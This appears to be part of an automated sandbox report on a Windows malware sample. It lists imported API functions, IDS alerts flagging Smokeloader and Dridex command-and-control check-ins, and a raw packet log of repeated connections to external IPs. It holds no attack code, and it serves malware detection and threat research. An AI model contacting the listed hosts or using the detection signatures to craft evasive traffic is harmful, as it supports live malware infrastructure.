| KERNEL32.dll | GlobalCompact, InterlockedIncrement, InterlockedDecrement, SetEnvironmentVariableW, CreateJobObjectW, QueryDosDeviceA, InterlockedCompareExchange, SetVolumeMountPointW, GetComputerNameW, GetTimeFormatA, GetTickCount, CreateNamedPipeW, LocalFlags, GetNumberFormatA, SetFileTime, ClearCommBreak, TlsSetValue, GetEnvironmentStrings, SetFileShortNameW, LoadLibraryW, CopyFileW, _hread, GetCalendarInfoA, SetVolumeMountPointA, GetVersionExW, GetFileAttributesA, GetModuleFileNameW, CreateActCtxA, GetEnvironmentVariableA, GetShortPathNameA, LCMapStringA, GetConsoleAliasExesA, GetStdHandle, GetLogicalDriveStringsA, GetLastError, GetCurrentDirectoryW, GetProcAddress, EnumSystemCodePagesW, SetComputerNameA, SetFileAttributesA, LoadLibraryA, InterlockedExchangeAdd, LocalAlloc, CreateHardLinkW, GetNumberFormatW, CreateEventW, OpenEventA, FoldStringW, GlobalWire, EnumDateFormatsW, GetShortPathNameW, SetCalendarInfoA, SetProcessShutdownParameters, GetDiskFreeSpaceExA, ReadConsoleInputW, GetCurrentProcessId, DebugBreak, GetTempPathA, CommConfigDialogW, GetLocaleInfoA, SetFilePointer, VerifyVersionInfoW, EnumCalendarInfoA, EncodePointer, DecodePointer, Sleep, InitializeCriticalSection, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, HeapFree, HeapReAlloc, GetModuleHandleW, ExitProcess, GetCommandLineW, HeapSetInformation, GetStartupInfoW, RaiseException, RtlUnwind, HeapAlloc, WideCharToMultiByte, LCMapStringW, MultiByteToWideChar, GetCPInfo, IsProcessorFeaturePresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, TerminateProcess, GetCurrentProcess, HeapCreate, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsFree, SetLastError, GetCurrentThreadId, WriteFile, FreeEnvironmentStringsW, GetEnvironmentStringsW, SetHandleCount, GetFileType, QueryPerformanceCounter, GetSystemTimeAsFileTime, HeapSize, GetACP, GetOEMCP, IsValidCodePage, GetStringTypeW |
| GDI32.dll | CreateDCW, GetCharWidth32A, GetCharWidthI |
| WINHTTP.dll | WinHttpOpen |
| Language of compilation system | Country where language is spoken | Map |
|---|---|---|
| Tamil | India | |
| Tamil | Sri Lanka | |
| Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol |
|---|---|---|---|---|---|---|---|---|
| 2024-10-07T14:59:24.450425+0200 | 2039103 | ET MALWARE Suspected Smokeloader Activity (POST) | 1 | 192.168.2.5 | 49770 | 105.197.97.247 | 80 | TCP |
| 2024-10-07T14:59:25.374466+0200 | 2039103 | ET MALWARE Suspected Smokeloader Activity (POST) | 1 | 192.168.2.5 | 49776 | 105.197.97.247 | 80 | TCP |
| 2024-10-07T14:59:26.314240+0200 | 2039103 | ET MALWARE Suspected Smokeloader Activity (POST) | 1 | 192.168.2.5 | 49782 | 105.197.97.247 | 80 | TCP |
| 2024-10-07T14:59:27.265046+0200 | 2039103 | ET MALWARE Suspected Smokeloader Activity (POST) | 1 | 192.168.2.5 | 49788 | 105.197.97.247 | 80 | TCP |
| 2024-10-07T14:59:28.193590+0200 | 2039103 | ET MALWARE Suspected Smokeloader Activity (POST) | 1 | 192.168.2.5 | 49794 | 105.197.97.247 | 80 | TCP |
| 2024-10-07T14:59:29.130090+0200 | 2039103 | ET MALWARE Suspected Smokeloader Activity (POST) | 1 | 192.168.2.5 | 49804 | 105.197.97.247 | 80 | TCP |
| 2024-10-07T14:59:30.253391+0200 | 2039103 | ET MALWARE Suspected Smokeloader Activity (POST) | 1 | 192.168.2.5 | 49810 | 105.197.97.247 | 80 | TCP |
| 2024-10-07T14:59:31.176635+0200 | 2039103 | ET MALWARE Suspected Smokeloader Activity (POST) | 1 | 192.168.2.5 | 49814 | 105.197.97.247 | 80 | TCP |
| 2024-10-07T14:59:32.219133+0200 | 2039103 | ET MALWARE Suspected Smokeloader Activity (POST) | 1 | 192.168.2.5 | 49822 | 105.197.97.247 | 80 | TCP |
| 2024-10-07T14:59:33.173977+0200 | 2039103 | ET MALWARE Suspected Smokeloader Activity (POST) | 1 | 192.168.2.5 | 49831 | 105.197.97.247 | 80 | TCP |
| 2024-10-07T14:59:34.105790+0200 | 2039103 | ET MALWARE Suspected Smokeloader Activity (POST) | 1 | 192.168.2.5 | 49837 | 105.197.97.247 | 80 | TCP |
| 2024-10-07T14:59:35.044145+0200 | 2039103 | ET MALWARE Suspected Smokeloader Activity (POST) | 1 | 192.168.2.5 | 49844 | 105.197.97.247 | 80 | TCP |
| 2024-10-07T14:59:35.980167+0200 | 2039103 | ET MALWARE Suspected Smokeloader Activity (POST) | 1 | 192.168.2.5 | 49850 | 105.197.97.247 | 80 | TCP |
| 2024-10-07T14:59:37.313136+0200 | 2039103 | ET MALWARE Suspected Smokeloader Activity (POST) | 1 | 192.168.2.5 | 49856 | 105.197.97.247 | 80 | TCP |
| 2024-10-07T14:59:38.356354+0200 | 2039103 | ET MALWARE Suspected Smokeloader Activity (POST) | 1 | 192.168.2.5 | 49867 | 105.197.97.247 | 80 | TCP |
| 2024-10-07T14:59:39.269702+0200 | 2039103 | ET MALWARE Suspected Smokeloader Activity (POST) | 1 | 192.168.2.5 | 49868 | 105.197.97.247 | 80 | TCP |
| 2024-10-07T14:59:40.231913+0200 | 2039103 | ET MALWARE Suspected Smokeloader Activity (POST) | 1 | 192.168.2.5 | 49874 | 105.197.97.247 | 80 | TCP |
| 2024-10-07T14:59:41.192149+0200 | 2039103 | ET MALWARE Suspected Smokeloader Activity (POST) | 1 | 192.168.2.5 | 49885 | 105.197.97.247 | 80 | TCP |
| 2024-10-07T14:59:42.137608+0200 | 2039103 | ET MALWARE Suspected Smokeloader Activity (POST) | 1 | 192.168.2.5 | 49891 | 105.197.97.247 | 80 | TCP |
| 2024-10-07T14:59:43.085742+0200 | 2039103 | ET MALWARE Suspected Smokeloader Activity (POST) | 1 | 192.168.2.5 | 49897 | 105.197.97.247 | 80 | TCP |
| 2024-10-07T14:59:44.028780+0200 | 2039103 | ET MALWARE Suspected Smokeloader Activity (POST) | 1 | 192.168.2.5 | 49903 | 105.197.97.247 | 80 | TCP |
| 2024-10-07T14:59:44.972761+0200 | 2039103 | ET MALWARE Suspected Smokeloader Activity (POST) | 1 | 192.168.2.5 | 49910 | 105.197.97.247 | 80 | TCP |
| 2024-10-07T14:59:45.907705+0200 | 2039103 | ET MALWARE Suspected Smokeloader Activity (POST) | 1 | 192.168.2.5 | 49916 | 105.197.97.247 | 80 | TCP |
| 2024-10-07T14:59:47.047276+0200 | 2039103 | ET MALWARE Suspected Smokeloader Activity (POST) | 1 | 192.168.2.5 | 49922 | 105.197.97.247 | 80 | TCP |
| 2024-10-07T14:59:49.566919+0200 | 2039103 | ET MALWARE Suspected Smokeloader Activity (POST) | 1 | 192.168.2.5 | 49939 | 105.197.97.247 | 80 | TCP |
| 2024-10-07T14:59:50.521037+0200 | 2039103 | ET MALWARE Suspected Smokeloader Activity (POST) | 1 | 192.168.2.5 | 49945 | 105.197.97.247 | 80 | TCP |
| 2024-10-07T14:59:51.497852+0200 | 2039103 | ET MALWARE Suspected Smokeloader Activity (POST) | 1 | 192.168.2.5 | 49952 | 105.197.97.247 | 80 | TCP |
| 2024-10-07T14:59:52.661203+0200 | 2039103 | ET MALWARE Suspected Smokeloader Activity (POST) | 1 | 192.168.2.5 | 49961 | 105.197.97.247 | 80 | TCP |
| 2024-10-07T14:59:53.588010+0200 | 2039103 | ET MALWARE Suspected Smokeloader Activity (POST) | 1 | 192.168.2.5 | 49969 | 105.197.97.247 | 80 | TCP |
| 2024-10-07T14:59:54.529610+0200 | 2039103 | ET MALWARE Suspected Smokeloader Activity (POST) | 1 | 192.168.2.5 | 49975 | 105.197.97.247 | 80 | TCP |
| 2024-10-07T14:59:56.016097+0200 | 2039103 | ET MALWARE Suspected Smokeloader Activity (POST) | 1 | 192.168.2.5 | 49979 | 105.197.97.247 | 80 | TCP |
| 2024-10-07T14:59:57.166667+0200 | 2039103 | ET MALWARE Suspected Smokeloader Activity (POST) | 1 | 192.168.2.5 | 49982 | 105.197.97.247 | 80 | TCP |
| 2024-10-07T14:59:58.325335+0200 | 2039103 | ET MALWARE Suspected Smokeloader Activity (POST) | 1 | 192.168.2.5 | 49993 | 105.197.97.247 | 80 | TCP |
| 2024-10-07T14:59:59.253273+0200 | 2039103 | ET MALWARE Suspected Smokeloader Activity (POST) | 1 | 192.168.2.5 | 49998 | 105.197.97.247 | 80 | TCP |
| 2024-10-07T15:00:14.419801+0200 | 2039103 | ET MALWARE Suspected Smokeloader Activity (POST) | 1 | 192.168.2.5 | 50012 | 188.40.141.211 | 443 | TCP |
| 2024-10-07T15:00:14.715498+0200 | 2809882 | ETPRO MALWARE Dridex Post Checkin Activity 3 | 1 | 192.168.2.5 | 50012 | 188.40.141.211 | 443 | TCP |
| 2024-10-07T15:00:16.825302+0200 | 2039103 | ET MALWARE Suspected Smokeloader Activity (POST) | 1 | 192.168.2.5 | 50013 | 188.40.141.211 | 443 | TCP |
| 2024-10-07T15:00:18.334781+0200 | 2809882 | ETPRO MALWARE Dridex Post Checkin Activity 3 | 1 | 192.168.2.5 | 50013 | 188.40.141.211 | 443 | TCP |
| 2024-10-07T15:01:05.953100+0200 | 2039103 | ET MALWARE Suspected Smokeloader Activity (POST) | 1 | 192.168.2.5 | 50014 | 105.197.97.247 | 80 | TCP |
| 2024-10-07T15:01:15.348447+0200 | 2039103 | ET MALWARE Suspected Smokeloader Activity (POST) | 1 | 192.168.2.5 | 50015 | 105.197.97.247 | 80 | TCP |
| 2024-10-07T15:01:27.089587+0200 | 2039103 | ET MALWARE Suspected Smokeloader Activity (POST) | 1 | 192.168.2.5 | 50016 | 105.197.97.247 | 80 | TCP |
| 2024-10-07T15:01:32.047885+0200 | 2039103 | ET MALWARE Suspected Smokeloader Activity (POST) | 1 | 192.168.2.5 | 50017 | 188.40.141.211 | 443 | TCP |
| 2024-10-07T15:01:32.309002+0200 | 2809882 | ETPRO MALWARE Dridex Post Checkin Activity 3 | 1 | 192.168.2.5 | 50017 | 188.40.141.211 | 443 | TCP |
| 2024-10-07T15:01:33.047947+0200 | 2039103 | ET MALWARE Suspected Smokeloader Activity (POST) | 1 | 192.168.2.5 | 50018 | 188.40.141.211 | 443 | TCP |
| 2024-10-07T15:01:33.325361+0200 | 2809882 | ETPRO MALWARE Dridex Post Checkin Activity 3 | 1 | 192.168.2.5 | 50018 | 188.40.141.211 | 443 | TCP |
| 2024-10-07T15:01:46.179545+0200 | 2039103 | ET MALWARE Suspected Smokeloader Activity (POST) | 1 | 192.168.2.5 | 50019 | 105.197.97.247 | 80 | TCP |
| 2024-10-07T15:01:54.998397+0200 | 2039103 | ET MALWARE Suspected Smokeloader Activity (POST) | 1 | 192.168.2.5 | 50020 | 188.40.141.211 | 443 | TCP |
| 2024-10-07T15:01:55.268074+0200 | 2809882 | ETPRO MALWARE Dridex Post Checkin Activity 3 | 1 | 192.168.2.5 | 50020 | 188.40.141.211 | 443 | TCP |
| 2024-10-07T15:01:56.212271+0200 | 2039103 | ET MALWARE Suspected Smokeloader Activity (POST) | 1 | 192.168.2.5 | 50021 | 188.40.141.211 | 443 | TCP |
| 2024-10-07T15:01:56.460168+0200 | 2809882 | ETPRO MALWARE Dridex Post Checkin Activity 3 | 1 | 192.168.2.5 | 50021 | 188.40.141.211 | 443 | TCP |
| 2024-10-07T15:02:07.860198+0200 | 2039103 | ET MALWARE Suspected Smokeloader Activity (POST) | 1 | 192.168.2.5 | 50022 | 189.195.132.134 | 80 | TCP |
| 2024-10-07T15:02:16.720307+0200 | 2039103 | ET MALWARE Suspected Smokeloader Activity (POST) | 1 | 192.168.2.5 | 50023 | 188.40.141.211 | 443 | TCP |
| 2024-10-07T15:02:17.024280+0200 | 2809882 | ETPRO MALWARE Dridex Post Checkin Activity 3 | 1 | 192.168.2.5 | 50023 | 188.40.141.211 | 443 | TCP |
| 2024-10-07T15:02:17.696520+0200 | 2039103 | ET MALWARE Suspected Smokeloader Activity (POST) | 1 | 192.168.2.5 | 50024 | 188.40.141.211 | 443 | TCP |
| 2024-10-07T15:02:18.001733+0200 | 2809882 | ETPRO MALWARE Dridex Post Checkin Activity 3 | 1 | 192.168.2.5 | 50024 | 188.40.141.211 | 443 | TCP |
| 2024-10-07T15:02:29.863734+0200 | 2039103 | ET MALWARE Suspected Smokeloader Activity (POST) | 1 | 192.168.2.5 | 50025 | 189.195.132.134 | 80 | TCP |
| 2024-10-07T15:02:39.765694+0200 | 2039103 | ET MALWARE Suspected Smokeloader Activity (POST) | 1 | 192.168.2.5 | 50026 | 188.40.141.211 | 443 | TCP |
| 2024-10-07T15:02:40.046670+0200 | 2809882 | ETPRO MALWARE Dridex Post Checkin Activity 3 | 1 | 192.168.2.5 | 50026 | 188.40.141.211 | 443 | TCP |
| 2024-10-07T15:02:40.760206+0200 | 2039103 | ET MALWARE Suspected Smokeloader Activity (POST) | 1 | 192.168.2.5 | 50027 | 188.40.141.211 | 443 | TCP |
| 2024-10-07T15:02:41.069076+0200 | 2809882 | ETPRO MALWARE Dridex Post Checkin Activity 3 | 1 | 192.168.2.5 | 50027 | 188.40.141.211 | 443 | TCP |
| 2024-10-07T15:02:50.926729+0200 | 2039103 | ET MALWARE Suspected Smokeloader Activity (POST) | 1 | 192.168.2.5 | 50028 | 189.195.132.134 | 80 | TCP |
| 2024-10-07T15:03:02.556191+0200 | 2039103 | ET MALWARE Suspected Smokeloader Activity (POST) | 1 | 192.168.2.5 | 50029 | 188.40.141.211 | 443 | TCP |
| 2024-10-07T15:03:02.864372+0200 | 2809882 | ETPRO MALWARE Dridex Post Checkin Activity 3 | 1 | 192.168.2.5 | 50029 | 188.40.141.211 | 443 | TCP |
| 2024-10-07T15:03:03.522877+0200 | 2039103 | ET MALWARE Suspected Smokeloader Activity (POST) | 1 | 192.168.2.5 | 50030 | 188.40.141.211 | 443 | TCP |
| 2024-10-07T15:03:03.824257+0200 | 2809882 | ETPRO MALWARE Dridex Post Checkin Activity 3 | 1 | 192.168.2.5 | 50030 | 188.40.141.211 | 443 | TCP |
                                        Oct 7, 2024 14:59:29.144401073 CEST8049810105.197.97.247192.168.2.5
                                        Oct 7, 2024 14:59:30.253298998 CEST8049810105.197.97.247192.168.2.5
                                        Oct 7, 2024 14:59:30.253309011 CEST8049810105.197.97.247192.168.2.5
                                        Oct 7, 2024 14:59:30.253314018 CEST8049810105.197.97.247192.168.2.5
                                        Oct 7, 2024 14:59:30.253391027 CEST4981080192.168.2.5105.197.97.247
                                        Oct 7, 2024 14:59:30.253580093 CEST4981080192.168.2.5105.197.97.247
                                        Oct 7, 2024 14:59:30.258548975 CEST4981480192.168.2.5105.197.97.247
                                        Oct 7, 2024 14:59:30.258841991 CEST8049810105.197.97.247192.168.2.5
                                        Oct 7, 2024 14:59:30.263360023 CEST8049814105.197.97.247192.168.2.5
                                        Oct 7, 2024 14:59:30.263422966 CEST4981480192.168.2.5105.197.97.247
                                        Oct 7, 2024 14:59:30.263648987 CEST4981480192.168.2.5105.197.97.247
                                        Oct 7, 2024 14:59:30.263648987 CEST4981480192.168.2.5105.197.97.247
                                        Oct 7, 2024 14:59:30.268642902 CEST8049814105.197.97.247192.168.2.5
                                        Oct 7, 2024 14:59:30.268867016 CEST8049814105.197.97.247192.168.2.5
                                        Oct 7, 2024 14:59:31.175985098 CEST8049814105.197.97.247192.168.2.5
                                        Oct 7, 2024 14:59:31.176558018 CEST8049814105.197.97.247192.168.2.5
                                        Oct 7, 2024 14:59:31.176635027 CEST4981480192.168.2.5105.197.97.247
                                        Oct 7, 2024 14:59:31.177113056 CEST4981480192.168.2.5105.197.97.247
                                        Oct 7, 2024 14:59:31.180226088 CEST4982280192.168.2.5105.197.97.247
                                        Oct 7, 2024 14:59:31.182082891 CEST8049814105.197.97.247192.168.2.5
                                        Oct 7, 2024 14:59:31.185290098 CEST8049822105.197.97.247192.168.2.5
                                        Oct 7, 2024 14:59:31.185393095 CEST4982280192.168.2.5105.197.97.247
                                        Oct 7, 2024 14:59:31.185761929 CEST4982280192.168.2.5105.197.97.247
                                        Oct 7, 2024 14:59:31.185786009 CEST4982280192.168.2.5105.197.97.247
                                        Oct 7, 2024 14:59:31.190629005 CEST8049822105.197.97.247192.168.2.5
                                        Oct 7, 2024 14:59:31.190845966 CEST8049822105.197.97.247192.168.2.5
                                        Oct 7, 2024 14:59:32.218347073 CEST8049822105.197.97.247192.168.2.5
                                        Oct 7, 2024 14:59:32.219069958 CEST8049822105.197.97.247192.168.2.5
                                        Oct 7, 2024 14:59:32.219132900 CEST4982280192.168.2.5105.197.97.247
                                        Oct 7, 2024 14:59:32.219192028 CEST4982280192.168.2.5105.197.97.247
                                        Oct 7, 2024 14:59:32.222599983 CEST4983180192.168.2.5105.197.97.247
                                        Oct 7, 2024 14:59:32.224394083 CEST8049822105.197.97.247192.168.2.5
                                        Oct 7, 2024 14:59:32.228171110 CEST8049831105.197.97.247192.168.2.5
                                        Oct 7, 2024 14:59:32.228456974 CEST4983180192.168.2.5105.197.97.247
                                        Oct 7, 2024 14:59:32.228586912 CEST4983180192.168.2.5105.197.97.247
                                        Oct 7, 2024 14:59:32.228606939 CEST4983180192.168.2.5105.197.97.247
                                        Oct 7, 2024 14:59:32.233433008 CEST8049831105.197.97.247192.168.2.5
                                        Oct 7, 2024 14:59:32.233550072 CEST8049831105.197.97.247192.168.2.5
                                        Oct 7, 2024 14:59:33.173722982 CEST8049831105.197.97.247192.168.2.5
                                        Oct 7, 2024 14:59:33.173912048 CEST8049831105.197.97.247192.168.2.5
                                        Oct 7, 2024 14:59:33.173976898 CEST4983180192.168.2.5105.197.97.247
                                        Oct 7, 2024 14:59:33.174029112 CEST4983180192.168.2.5105.197.97.247
                                        Oct 7, 2024 14:59:33.176975012 CEST4983780192.168.2.5105.197.97.247
                                        Oct 7, 2024 14:59:33.178930044 CEST8049831105.197.97.247192.168.2.5
                                        Oct 7, 2024 14:59:33.181982040 CEST8049837105.197.97.247192.168.2.5
                                        Oct 7, 2024 14:59:33.182079077 CEST4983780192.168.2.5105.197.97.247
                                        Oct 7, 2024 14:59:33.182248116 CEST4983780192.168.2.5105.197.97.247
                                        Oct 7, 2024 14:59:33.182384968 CEST4983780192.168.2.5105.197.97.247
                                        Oct 7, 2024 14:59:33.187038898 CEST8049837105.197.97.247192.168.2.5
                                        Oct 7, 2024 14:59:33.187213898 CEST8049837105.197.97.247192.168.2.5
                                        Oct 7, 2024 14:59:34.105287075 CEST8049837105.197.97.247192.168.2.5
                                        Oct 7, 2024 14:59:34.105741024 CEST8049837105.197.97.247192.168.2.5
                                        Oct 7, 2024 14:59:34.105789900 CEST4983780192.168.2.5105.197.97.247
                                        Oct 7, 2024 14:59:34.106506109 CEST4983780192.168.2.5105.197.97.247
                                        Oct 7, 2024 14:59:34.110728979 CEST4984480192.168.2.5105.197.97.247
                                        Oct 7, 2024 14:59:34.111345053 CEST8049837105.197.97.247192.168.2.5
                                        Oct 7, 2024 14:59:34.116442919 CEST8049844105.197.97.247192.168.2.5
                                        Oct 7, 2024 14:59:34.116563082 CEST4984480192.168.2.5105.197.97.247
                                        Oct 7, 2024 14:59:34.116712093 CEST4984480192.168.2.5105.197.97.247
                                        Oct 7, 2024 14:59:34.116729021 CEST4984480192.168.2.5105.197.97.247
                                        Oct 7, 2024 14:59:34.121618032 CEST8049844105.197.97.247192.168.2.5
                                        Oct 7, 2024 14:59:34.122020006 CEST8049844105.197.97.247192.168.2.5
                                        Oct 7, 2024 14:59:35.044061899 CEST8049844105.197.97.247192.168.2.5
                                        Oct 7, 2024 14:59:35.044076920 CEST8049844105.197.97.247192.168.2.5
                                        Oct 7, 2024 14:59:35.044145107 CEST4984480192.168.2.5105.197.97.247
                                        Oct 7, 2024 14:59:35.044379950 CEST4984480192.168.2.5105.197.97.247
                                        Oct 7, 2024 14:59:35.047786951 CEST4985080192.168.2.5105.197.97.247
                                        Oct 7, 2024 14:59:35.052967072 CEST8049844105.197.97.247192.168.2.5
                                        Oct 7, 2024 14:59:35.054743052 CEST8049850105.197.97.247192.168.2.5
                                        Oct 7, 2024 14:59:35.054815054 CEST4985080192.168.2.5105.197.97.247
                                        Oct 7, 2024 14:59:35.054987907 CEST4985080192.168.2.5105.197.97.247
                                        Oct 7, 2024 14:59:35.055008888 CEST4985080192.168.2.5105.197.97.247
                                        Oct 7, 2024 14:59:35.059777021 CEST8049850105.197.97.247192.168.2.5
                                        Oct 7, 2024 14:59:35.060149908 CEST8049850105.197.97.247192.168.2.5
                                        Oct 7, 2024 14:59:35.979567051 CEST8049850105.197.97.247192.168.2.5
                                        Oct 7, 2024 14:59:35.980109930 CEST8049850105.197.97.247192.168.2.5
                                        Oct 7, 2024 14:59:35.980166912 CEST4985080192.168.2.5105.197.97.247
                                        Oct 7, 2024 14:59:35.982372999 CEST4985080192.168.2.5105.197.97.247
                                        Oct 7, 2024 14:59:35.987262964 CEST8049850105.197.97.247192.168.2.5
                                        Oct 7, 2024 14:59:36.401704073 CEST4985680192.168.2.5105.197.97.247
                                        Oct 7, 2024 14:59:36.406632900 CEST8049856105.197.97.247192.168.2.5
                                        Oct 7, 2024 14:59:36.406860113 CEST4985680192.168.2.5105.197.97.247
                                        Oct 7, 2024 14:59:36.406860113 CEST4985680192.168.2.5105.197.97.247
                                        Oct 7, 2024 14:59:36.406965017 CEST4985680192.168.2.5105.197.97.247
                                        Oct 7, 2024 14:59:36.411844969 CEST8049856105.197.97.247192.168.2.5
                                        Oct 7, 2024 14:59:36.412195921 CEST8049856105.197.97.247192.168.2.5
                                        Oct 7, 2024 14:59:37.312268972 CEST8049856105.197.97.247192.168.2.5
                                        Oct 7, 2024 14:59:37.313024998 CEST8049856105.197.97.247192.168.2.5
                                        Oct 7, 2024 14:59:37.313136101 CEST4985680192.168.2.5105.197.97.247
                                        Oct 7, 2024 14:59:37.313183069 CEST4985680192.168.2.5105.197.97.247
                                        Oct 7, 2024 14:59:37.316435099 CEST4986780192.168.2.5105.197.97.247
                                        Oct 7, 2024 14:59:37.317996025 CEST8049856105.197.97.247192.168.2.5
                                        Oct 7, 2024 14:59:37.321436882 CEST8049867105.197.97.247192.168.2.5
                                        Oct 7, 2024 14:59:37.321505070 CEST4986780192.168.2.5105.197.97.247
                                        Oct 7, 2024 14:59:37.321669102 CEST4986780192.168.2.5105.197.97.247
                                        Oct 7, 2024 14:59:37.321669102 CEST4986780192.168.2.5105.197.97.247
                                        Oct 7, 2024 14:59:37.327128887 CEST8049867105.197.97.247192.168.2.5
                                        Oct 7, 2024 14:59:37.328677893 CEST8049867105.197.97.247192.168.2.5
                                        Oct 7, 2024 14:59:38.356266975 CEST8049867105.197.97.247192.168.2.5
                                        Oct 7, 2024 14:59:38.356276989 CEST8049867105.197.97.247192.168.2.5
                                        Oct 7, 2024 14:59:38.356288910 CEST8049867105.197.97.247192.168.2.5
                                        Oct 7, 2024 14:59:38.356353998 CEST4986780192.168.2.5105.197.97.247
                                        Oct 7, 2024 14:59:38.356380939 CEST4986780192.168.2.5105.197.97.247
                                        Oct 7, 2024 14:59:38.356515884 CEST4986780192.168.2.5105.197.97.247
                                        Oct 7, 2024 14:59:38.360152960 CEST4986880192.168.2.5105.197.97.247
                                        Oct 7, 2024 14:59:38.361428976 CEST8049867105.197.97.247192.168.2.5
                                        Oct 7, 2024 14:59:38.364954948 CEST8049868105.197.97.247192.168.2.5
                                        Oct 7, 2024 14:59:38.365072966 CEST4986880192.168.2.5105.197.97.247
                                        Oct 7, 2024 14:59:38.365433931 CEST4986880192.168.2.5105.197.97.247
                                        Oct 7, 2024 14:59:38.365433931 CEST4986880192.168.2.5105.197.97.247
                                        Oct 7, 2024 14:59:38.370198965 CEST8049868105.197.97.247192.168.2.5
                                        Oct 7, 2024 14:59:38.370218039 CEST8049868105.197.97.247192.168.2.5
                                        Oct 7, 2024 14:59:39.268884897 CEST8049868105.197.97.247192.168.2.5
                                        Oct 7, 2024 14:59:39.269633055 CEST8049868105.197.97.247192.168.2.5
                                        Oct 7, 2024 14:59:39.269701958 CEST4986880192.168.2.5105.197.97.247
                                        Oct 7, 2024 14:59:39.275887012 CEST4986880192.168.2.5105.197.97.247
                                        Oct 7, 2024 14:59:39.280821085 CEST8049868105.197.97.247192.168.2.5
                                        Oct 7, 2024 14:59:39.302546978 CEST4987480192.168.2.5105.197.97.247
                                        Oct 7, 2024 14:59:39.307663918 CEST8049874105.197.97.247192.168.2.5
                                        Oct 7, 2024 14:59:39.307744026 CEST4987480192.168.2.5105.197.97.247
                                        Oct 7, 2024 14:59:39.307909012 CEST4987480192.168.2.5105.197.97.247
                                        Oct 7, 2024 14:59:39.307909012 CEST4987480192.168.2.5105.197.97.247
                                        Oct 7, 2024 14:59:39.312817097 CEST8049874105.197.97.247192.168.2.5
                                        Oct 7, 2024 14:59:39.312836885 CEST8049874105.197.97.247192.168.2.5
                                        Oct 7, 2024 14:59:40.231791973 CEST8049874105.197.97.247192.168.2.5
                                        Oct 7, 2024 14:59:40.231837034 CEST8049874105.197.97.247192.168.2.5
                                        Oct 7, 2024 14:59:40.231913090 CEST4987480192.168.2.5105.197.97.247
                                        Oct 7, 2024 14:59:40.232117891 CEST4987480192.168.2.5105.197.97.247
                                        Oct 7, 2024 14:59:40.235404015 CEST4988580192.168.2.5105.197.97.247
                                        Oct 7, 2024 14:59:40.236985922 CEST8049874105.197.97.247192.168.2.5
                                        Oct 7, 2024 14:59:40.240279913 CEST8049885105.197.97.247192.168.2.5
                                        Oct 7, 2024 14:59:40.240370035 CEST4988580192.168.2.5105.197.97.247
                                        Oct 7, 2024 14:59:40.240510941 CEST4988580192.168.2.5105.197.97.247
                                        Oct 7, 2024 14:59:40.240534067 CEST4988580192.168.2.5105.197.97.247
                                        Oct 7, 2024 14:59:40.245302916 CEST8049885105.197.97.247192.168.2.5
                                        Oct 7, 2024 14:59:40.245789051 CEST8049885105.197.97.247192.168.2.5
                                        Oct 7, 2024 14:59:41.191051006 CEST8049885105.197.97.247192.168.2.5
                                        Oct 7, 2024 14:59:41.192085028 CEST8049885105.197.97.247192.168.2.5
                                        Oct 7, 2024 14:59:41.192148924 CEST4988580192.168.2.5105.197.97.247
                                        Oct 7, 2024 14:59:41.192276001 CEST4988580192.168.2.5105.197.97.247
                                        Oct 7, 2024 14:59:41.197151899 CEST8049885105.197.97.247192.168.2.5
                                        Oct 7, 2024 14:59:41.205389023 CEST4989180192.168.2.5105.197.97.247
                                        Oct 7, 2024 14:59:41.210236073 CEST8049891105.197.97.247192.168.2.5
                                        Oct 7, 2024 14:59:41.210310936 CEST4989180192.168.2.5105.197.97.247
                                        Oct 7, 2024 14:59:41.210547924 CEST4989180192.168.2.5105.197.97.247
                                        Oct 7, 2024 14:59:41.210547924 CEST4989180192.168.2.5105.197.97.247
                                        Oct 7, 2024 14:59:41.215491056 CEST8049891105.197.97.247192.168.2.5
                                        Oct 7, 2024 14:59:41.215502024 CEST8049891105.197.97.247192.168.2.5
                                        Oct 7, 2024 14:59:42.137079000 CEST8049891105.197.97.247192.168.2.5
                                        Oct 7, 2024 14:59:42.137543917 CEST8049891105.197.97.247192.168.2.5
                                        Oct 7, 2024 14:59:42.137608051 CEST4989180192.168.2.5105.197.97.247
                                        Oct 7, 2024 14:59:42.137662888 CEST4989180192.168.2.5105.197.97.247
                                        Oct 7, 2024 14:59:42.141005993 CEST4989780192.168.2.5105.197.97.247
                                        Oct 7, 2024 14:59:42.142462015 CEST8049891105.197.97.247192.168.2.5
                                        Oct 7, 2024 14:59:42.145883083 CEST8049897105.197.97.247192.168.2.5
                                        Oct 7, 2024 14:59:42.146378040 CEST4989780192.168.2.5105.197.97.247
                                        Oct 7, 2024 14:59:42.146612883 CEST4989780192.168.2.5105.197.97.247
                                        Oct 7, 2024 14:59:42.146632910 CEST4989780192.168.2.5105.197.97.247
                                        Oct 7, 2024 14:59:42.151587963 CEST8049897105.197.97.247192.168.2.5
                                        Oct 7, 2024 14:59:42.152621031 CEST8049897105.197.97.247192.168.2.5
                                        Oct 7, 2024 14:59:43.084280968 CEST8049897105.197.97.247192.168.2.5
                                        Oct 7, 2024 14:59:43.085601091 CEST8049897105.197.97.247192.168.2.5
                                        Oct 7, 2024 14:59:43.085741997 CEST4989780192.168.2.5105.197.97.247
                                        Oct 7, 2024 14:59:43.085741997 CEST4989780192.168.2.5105.197.97.247
                                        Oct 7, 2024 14:59:43.088990927 CEST4990380192.168.2.5105.197.97.247
                                        Oct 7, 2024 14:59:43.090658903 CEST8049897105.197.97.247192.168.2.5
                                        Oct 7, 2024 14:59:43.093935966 CEST8049903105.197.97.247192.168.2.5
                                        Oct 7, 2024 14:59:43.094247103 CEST4990380192.168.2.5105.197.97.247
                                        Oct 7, 2024 14:59:43.094247103 CEST4990380192.168.2.5105.197.97.247
                                        Oct 7, 2024 14:59:43.094276905 CEST4990380192.168.2.5105.197.97.247
                                        Oct 7, 2024 14:59:43.099175930 CEST8049903105.197.97.247192.168.2.5
                                        Oct 7, 2024 14:59:43.099256992 CEST8049903105.197.97.247192.168.2.5
                                        Oct 7, 2024 14:59:44.027868032 CEST8049903105.197.97.247192.168.2.5
                                        Oct 7, 2024 14:59:44.028537035 CEST8049903105.197.97.247192.168.2.5
                                        Oct 7, 2024 14:59:44.028779984 CEST4990380192.168.2.5105.197.97.247
                                        Oct 7, 2024 14:59:44.028779984 CEST4990380192.168.2.5105.197.97.247
                                        Oct 7, 2024 14:59:44.032675028 CEST4991080192.168.2.5105.197.97.247
